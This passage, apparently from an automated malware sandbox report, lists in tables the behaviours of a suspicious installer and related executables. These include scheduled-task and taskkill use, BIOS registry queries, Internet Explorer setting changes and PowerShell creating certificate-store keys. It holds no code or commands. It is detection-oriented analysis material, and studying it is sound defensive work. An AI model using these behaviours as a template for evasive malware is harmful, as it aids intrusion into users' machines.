| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\Instance\ | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "6" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | N/A | N/A |
